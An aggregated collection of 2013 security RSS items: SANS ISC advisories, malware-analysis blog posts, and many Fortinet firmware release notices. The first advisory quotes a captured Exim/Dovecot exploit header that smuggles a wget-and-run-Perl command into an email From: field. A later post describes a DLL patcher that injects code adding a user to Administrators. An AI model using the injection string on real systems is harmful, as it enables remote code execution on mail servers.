==> Exim/Dovecot exploit making the rounds, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell" parameter. Or if you are, make darn sure you know what you are doing, and how to defend yourself. -- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> 100% Compliant (for 65% of the systems), (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml At a community college where I'm helping out whenever they panic on security issues, I recently was confronted with the odd reality of a lingering malware infection on their network, even though they had deployed a custom anti-virus (AV) pattern ("extra.dat") to eradicate the problem. Of course, these days, reliance on anti-virus is somewhat moot to begin with, our recent tally of fresh samples submitted to VirusTotal had AV lagging behind about 8 days or so. If you caught a keylogger spyware, 8 days is plenty to wreak havoc. I usually compare today's AV to the coroner in CSI, he can probably tell what killed you, but won't keep you alive. But back to the college. Turns out they verify on a weekly basis if all the PCs have a current pattern, and they also verified that all their PCs got the "extra" pattern. The only problem was, their definition of "all" relied on the AV-tool itself. Obviously, if a PC doesn't have anti-virus installed, it won't show up on the anti-virus console. Hence, if your AV claims you have 100% compliance, you might want to check an alternate repository, like for example your Active Directory, to compare numbers. When I ran this test at the college, I found that their network/AD had 51 more workstations than their AV knew about. No wonder they still had frequent hits on the IDS for the backdoor traffic. Never rely on a single security tool to tell you that everything is fine. Throw two or more sets of data against each other, and investigate discrepancies. Like your fishing or drinking or training buddy, security tools lie. Get acquainted with the usual pattern of lies (or obfuscated truths :), and surprises and disappointments will become less frequent. (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Friday, June 7th 2013 http://isc.sans.edu/podcastdetail.html?id=3353, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> PHP patches - see http://www.php.net/ChangeLog-5.php - fixes CVE2013-2110, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Plesk 0-day: Real or not?, (Fri, Jun 7th)

http://isc.sans.org/rssfeed_full.xml Yesterday, a poster to the full disclosure mailing list described a possible new 0-day vulnerability against Plesk. Contributing to the vulnerability is a very odd configuration choice to expose "/usr/bin" via a ScriptAlias, making executables inside the directory reachable via URLs. The big question that hasn't been answered so far is how common this configuration choice is. Appaerently, some versions of Plesk on CentOS 5 are configured this way, but not necessarily exploitable. The exploit is pretty easy to spot. It sends a heavily URL encoded POST request with a "Googlebot" user agent. Google typically doesn't send POST requests, so they are pretty easy to spot. I found a couple POSTS from "Google" (actually a "random" Chinese IP address, 222.187.222.122 ) in our web logs here. Masquearding as Google is a common trick among exploit scripts. Please verify that your Apache configuration does NOT include this line: ScriptAlias /phppath/ "/usr/bin/" Let us know if you spot it in the wild. -- Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Google Chrome has been updated to version 27.0.1453.110, (Thu, Jun 6th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs. You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little over-kill for such a simple task. Then I realized I could do this from a standard console window command prompt: cmd /v:on set lines = 0 for /r %a in (*.java) do (find /v /c "" "%a" > %temp%\temp.txt for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b)) echo %lines% The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issues when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well, however nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear as to what the function does. Since you don't have access to the callers of this function, I'll tell you this: * The first argument is a null-terminated ASCII string. * The second argument is a null-terminated ASCII string. * The third argument is an integer. Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations: * Cannot refer to the name of a person, place, or time. * Cannot refer to anything obscene or offensive. * Cannot be found in a dictionary or web-search. * Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters. * Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next). * Must be humanly pronouncable. * Must be between four and eight letters in length. * I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above. The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And to in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5. Here's the function: sub_0 proc near var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi mov esi, [ebp+ arg_4 ] mov [ebp+ var_8 ], 697A259Dh xor [ebp+ var_8 ], 182Ch inc dword ptr ds: 42C094h and [ebp+ var_C ], 0 and [ebp+ var_4 ], 0 jmp short loc_94 ; ----------------------------------------------------------------------- loc_2A: ; CODE XREF: sub_0+A6j xor ebx, ebx add [ebp+ var_8 ], 3AA5h inc dword ptr ds: 42C094h xor edi, edi jmp short loc_81 ; ----------------------------------------------------------------------- loc_3D: ; CODE XREF: sub_0+8Fj mov eax, [ebp+ var_4 ] add eax, edi mov edx, [ebp+ arg_0 ] movsx eax, byte ptr [edx+eax] movsx edx, byte ptr [esi+edi] cmp eax, edx jnz short loc_52 inc ebx loc_52: ; CODE XREF: sub_0+4Fj mov ecx, esi or eax, 0FFFFFFFFh loc_57: ; CODE XREF: sub_0+5Cj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_57 cmp ebx, eax jnz short loc_72 inc [ebp+ var_C ] mov eax, [ebp+ arg_8 ] cmp [ebp+ var_C ], eax jnz short loc_72 mov eax, [ebp+ var_4 ] jmp short loc_C0 ; ----------------------------------------------------------------------- loc_72: ; CODE XREF: sub_0+60j ; sub_0+6Bj mov eax, 43C9h mul [ebp+ var_8 ] mov [ebp+ var_10 ], eax mov [ebp+ var_8 ], eax inc edi loc_81: ; CODE XREF: sub_0+3Bj mov ecx, esi or eax, 0FFFFFFFFh loc_86: ; CODE XREF: sub_0+8Bj inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_86 cmp edi, eax jb short loc_3D inc [ebp+ var_4 ] loc_94: ; CODE XREF: sub_0+28j mov eax, [ebp+ arg_0 ] mov ecx, eax or eax, 0FFFFFFFFh loc_9C: ; CODE XREF: sub_0+A1j inc eax cmp byte ptr [ecx+eax], 0 jnz short loc_9C cmp [ebp+ var_4 ], eax jb short loc_2A mov eax, 0FFFFh jmp short loc_C0 ; ----------------------------------------------------------------------- mov eax, 514Ah mul dword ptr [ebp- 8 ] mov [ebp- 10h ], eax mov eax, [ebp- 10h ] mov [ebp- 8 ], eax loc_C0: ; CODE XREF: sub_0+70j ; sub_0+ADj pop edi pop esi pop ebx leave retn sub_0 endp And here's the raw byte-code for the function above: 5589E583EC105356578B750CC745F89D257A698175F82C180000FF0594C04200 8365F4008365FC00EB6A31DB8145F8A53A0000FF0594C0420031FFEB448B45FC 01F88B55080FBE04020FBE143E39D075014389F183C8FF40803C010075F939C3 7510FF45F48B45103945F475058B45FCEB4EB8C9430000F765F88945F08945F8 4789F183C8FF40803C010075F939C772ACFF45FC8B450889C183C8FF40803C01 0075F93945FC7282B8FFFF0000EB11B84A510000F765F88945F08B45F08945F8 5F5E5BC9C3

==> Virus Bulletin 2006

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I bought my plane ticket a few hours ago for Virus Bulletin 2006. I'm looking forward to rubbing elbows with other virus analysts and discussing the latest and greatest reverse engineering tools and methods. If you're going to VB'06 as well, send me an e-mail or find me in person and mention my blog and I'll buy you a beer (which shouldn't be too hard seeing as how the conference will be in Montreal)!

==> Unpacking DLLs and Drivers with OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx People often ask me how to unpack DLLs and drivers. A common assumption is that it is necessary to use OllyDbg's LOADDLL for unpacking DLLs and that a ring-0 debugger such as SoftICE or WinDbg is necessary for unpacking drivers. With a little tweaking, we can use regular OllyDbg to unpack packed DLLs and even many packed drivers. I don't know about you, but I've always had problems with LOADDLL. Even though it's well documented in OllyDbg's help file (the source is even included in the help file), I'd rather not use it if I don't have to. So how can we load a DLL into OllyDbg so that we can unpack it like we would a normal EXE? All that you need to do is set the IMAGE_FILE_DLL bit to zero in the Characteristics field of the PE's IMAGE_FILE_HEADER structure. You could use a hex editor to make this change, but it's easier with a PE editor like LordPE. Once this flag is zeroed out, you can load the "DLL" into OllyDbg and OllyDbg and the OS will interpret it as an EXE. You can then unpack it as you would an EXE (trace to the OEP, dump, fix the imports, etc.), and then set the IMAGE_FILE_DLL bit back to one in the unpacked file. The only catch is that many unpacking stubs check to see if [EBP+0x0C] == 1 (does the fdwReason argument to DllMain equal DLL_PROCESS_ATTACH), and if it doesn't equal 1 then it won't continue to unpack itself. You can fix this problem by looking for this comparison and forcing a jump/no-jump or by manually pushing three DWORDs onto the stack (before executing the first instruction at the EP), the second of which should be 1. We can use the same PE header patching trick for loading drivers into OllyDbg for unpacking purposes. By setting the Subsystem field to 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI) in the PE's IMAGE_OPTIONAL_HEADER, OllyDbg and the OS will interpret the file as an EXE instead of as a driver. This allows us to trace through the unpacking stub until the code and data are unpacked, and we can dump the process when we find the OEP. Of course if the unpacking stub is trying to execute instructions/functions that need to be executed from ring-0 then we won't be able to unpack it like this. However, if the unpacking stub is just doing a lot of simple XORing to unpack the original code and data, then we should be able to use this trick to successfully unpack the driver with OllyDbg.

==> FortiCache 2.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.3.0 B0273 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC, * FCHV64

==> FortiClient Mac 5.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.4 B0116 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.4 B0276 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiDB 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiDB 5.0.0 B0002 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDB_400B, FDB_1000B, FDB_1000C, * FDB_2000B, FDB_Stand-alone

==> FortiAP 5.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.4 B0039 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C, FAP_14C, * FAP_28C

==> FortiOS 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.3 B0208 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A, FGT_60D, * FWF_60D, FGT_3240C, FGT_3600C, * FGT_5001C, FGT_VM64_XEN

==> FortiVoice 7.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.3.0 B003 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> FortiAnalyzer 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_300D

==> FortiManager 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_300D

==> FortiDDoS 3.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.2.1 B108 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiAuthenticator 2.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.2.1 B0208 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_200D, FAC_400C, FAC_1000C, * FAC_3000B, FAC_VM

==> FortiMail 5.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiMail 5.0.1 B0123 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FE_100C, FE_2000A, FE_2000B, * FE_200D, FE_3000C, FE_3000D, * FE_4000, FE_400B, FE_400C, * FE_5001A, FE_5002B, FE_VM,

==> FortiWeb 5.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 5.0.0 B0009 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_3000D, FWB_3000DFSX, FWB_4000C, * FWB_4000D, FWB_VM-64bit

==> FortiOS 4.3.14

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.14 B0665 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_3240C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C, FGT_60C_POE, FGT_20C_ADSL_A, * FWF_20C_ADSL_A

==> FortiCache 2.2.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.2 B0226 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCHV64

==> FortiADC 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiADC 2.1.0 B0056 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAD_VM

==> FortiDDoS 3.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiDDoS 3.2.0 B107 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FDD_100A, FDD_200A, FDD_300A,

==> FortiSwitchOS 2.0.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitchOS 2.0.1 B0007 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FSW_324B_POE, FSW_348B, FSW_448B,

==> FortiDNS 1.2.1

http://pub.kb.fortinet.com/rss/firmware.xml FortiDNS 1.2.1 B0121 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FNS_400C, FNS_1000C, FNS_VM,

==> FortiOS 4.3.13

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.13 B0664 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_3240C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C, FGT_60C_POE, FGT_20C_ADSL_A, * FWF_20C_ADSL_A

==> FortiClient Mac 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.3 B0105 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.3 B0246 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiSwitchOS 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitchOS 2.0.0 B0005 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FSW_324B_POE, FSW_348B

==> FortiAuthenticator 2.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.2.0 B0205 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_200D, FAC_400C, FAC_1000C, * FAC_3000B, FAC_VM

==> FortiWeb 4.4.7

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.7 B0689 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit, FWB_4000D,

==> FortiAnalyzer 4.3.7

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.7 B0705 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64, FLG_200D

==> FortiCache 2.2.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.2 B0226 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiAnalyzer 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_1000B, FAZ_1000C, FAZ_100C, * FAZ_2000A, FAZ_2000B, FAZ_4000A, * FAZ_4000B, FAZ_400B, FAZ_400C, * FAZ_VM32, FAZ_VM64, FAZ_200D,

==> FortiManager 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_1000C, FMG_100C, FMG_3000B, * FMG_3000C, FMG_400B, FMG_400C, * FMG_5001A, FMG_VM32, FMG_VM64, * FMG_200D

==> FortiAP 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.3 B0032 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C, FAP_14C,

==> FortiOS 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.2 B0179 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_60D, FWF_60D

==> FortiOS 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.2 B0179 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_3600C

==> FortiClient Mac 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.2 B0098 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.2 B0225 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiAP 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.2 B0031 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C, FAP_14C,

==> FortiOS 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.2 B0179 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A, FGT_3240C, * FGT_5001C

==> FortiExploreriOS 1.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiExploreriOS 1.0.4 B0118 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * iOS

==> FortiVoice 7.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.3.0 B002 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> Keeping skills current in a changing world

http://rdist.root.org/feed/ I came across this article on how older tech workers are having trouble finding work. I’m sure many others have written about whether this is true, whose fault it is, and whether H1B visas should be increased or not. I haven’t done the research so I can’t comment on such things, but I do know […]

==> History of memory corruption vulnerabilities and exploits

http://rdist.root.org/feed/ I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of […]

==> Has HTML5 made us more secure?

http://rdist.root.org/feed/ Brad Hill recently wrote an article claiming that HTML5 has made us more secure, not less. His essential claim is that over the last 10 years, browsers have become more secure. He compares IE6, ActiveX, and Flash in 2002 (when he started in infosec) with HTML5 in order to make this point. While I think […]

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to […]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the […]

==> RSA repeats earlier claims, but louder

